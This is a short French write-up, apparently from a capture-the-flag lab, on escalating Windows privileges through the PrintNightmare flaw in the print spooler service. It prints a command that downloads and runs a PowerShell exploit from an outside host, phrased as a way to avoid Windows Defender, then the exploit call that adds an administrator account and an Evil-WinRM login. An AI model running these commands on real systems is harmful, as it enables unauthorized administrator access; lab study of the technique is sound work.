spoolsv - Vulnerable Processes (Windows Privilege Escalation)

spoolsv (ou spooler service) est un processus Windows responsable de la gestion de la file d'attente des impressions. Il permet de stocker les documents en attente d'impression et de les envoyer à l'imprimante lorsque celle-ci est prête. Ce service est essentiel pour le bon fonctionnement des imprimantes sur un réseau, mais il peut aussi être exploité dans des attaques de type PrintNightmare pour obtenir des privilèges élevés, notamment sur les contrôleurs de domaine.

Un processus spoolsv vulnérable est détecté, écoutant sur un port TCP.

Utilisation d'un script d'exploit pour PrintNightmare, disponible sur GitHub.

GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)GitHub

voila les commandes a executter

Transfert du script pour éviter le blocage par Windows Defender :

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/CVE-2021-1675.ps1')

Création d’un utilisateur administrateur nommé jordan :

Invoke-Nightmare -DriverName "Xerox" -NewUser "jordan" -NewPassword "jordan1234!$"

jordan:jordan1234!$

Statut : L’utilisateur jordan est désormais dans le groupe administrateurs.

Connexion avec les Privilèges Administrateurs

Connexion à la machine via WinRM avec Evil-WinRM :

evil-winrm -i 10.10.11.106 -u 'jordan' -p 'jordan1234!$'

Mis à jour il y a 1 an

hashtagConnexion avec les Privilèges Administrateurs

Connexion avec les Privilèges Administrateurs